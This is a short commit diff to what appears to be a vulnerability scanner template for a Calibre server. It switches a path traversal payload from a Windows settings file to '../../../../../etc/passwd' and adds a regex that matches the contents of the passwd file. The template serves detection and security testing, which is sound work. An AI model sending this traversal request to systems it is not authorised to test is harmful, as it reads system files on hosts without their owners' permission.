linux payload

main
Dhiyaneshwaran 2024-08-01 17:48:08 +05:30 committed by GitHub
parent d284320ff9
commit ef61b23e12
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 5 additions and 5 deletions

View File

@ -34,7 +34,7 @@ http:
Host: {{Hostname}} Host: {{Hostname}}
Content-Type: application/json Content-Type: application/json
["extra_file", {{book_ids}}, "..\\..\\..\\Calibre Settings\\gui.json", ""] ["extra_file", {{book_ids}}, "../../../../../etc/passwd", ""]
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -43,11 +43,11 @@ http:
words: words:
- "application/json" - "application/json"
- type: word - type: regex
part: body part: body
words: regex:
- "No such file or directory:" - 'root:.*:0:0:'
- "Traceback" - '"result":'
condition: and condition: and
- type: status - type: status